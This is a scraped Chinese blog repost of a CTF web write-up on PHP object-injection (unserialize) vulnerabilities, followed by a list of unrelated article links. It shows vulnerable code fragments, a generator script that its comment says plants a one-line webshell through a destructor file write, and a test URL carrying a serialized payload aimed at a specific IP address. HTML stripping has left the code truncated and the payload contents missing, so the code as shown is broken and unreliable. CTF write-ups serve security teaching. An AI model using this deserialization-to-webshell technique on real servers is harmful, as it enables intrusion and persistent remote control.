博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【CTF WEB】反序列化
阅读量:4653 次
发布时间:2019-06-09

本文共 429 字,大约阅读时间需要 1 分钟。

反序列化

漏洞代码

var); fclose($fb); } } $class = $_GET['code']; $class_unser = unserialize($class); unset($class_unser); ?>

写一个php的脚本,执行得到一串序列化后字符串,生成的代码是不会在浏览器直接显示的,需要查看源码才能看到完整内容。

';//一句话木马}$a=new example();//顶替原来的example,从而执行destruct函数,所以名称还是要写成exampleecho serialize($a);//输出序列化后的结果?>

测试方法

http://218.2.197.236:26225/?code=O:7:"example":1:{s:3:"var";s:31:"
";}

转载于:https://www.cnblogs.com/17bdw/p/9723387.html

你可能感兴趣的文章
extjs gridpanel滚动条问题显示数据不完整
查看>>
编写WebService 并发布到IIS中
查看>>
C语言 · 报时助手
查看>>
ACM C++
查看>>
项目部署
查看>>
【经验】CS
查看>>
多线程下载实例
查看>>
Oracle redo undo
查看>>
[转] Ubuntu安装Fcitx以及Fcitx输入中文不显示候选词框的解决办法
查看>>
多表单提交
查看>>
在linux平台实现atosl
查看>>
软件质量属性的场景描述
查看>>
数据格式化
查看>>
Linux的常用用法
查看>>
JAVA事务系列一:事务基本概念
查看>>
12月5日站立会议
查看>>
SQL 语法学习
查看>>
嗯---NOI水题集合之:阿狸的打字机
查看>>
WPF拖动DataGrid滚动条时内容混乱的解决方法
查看>>
tomcat定时重启
查看>>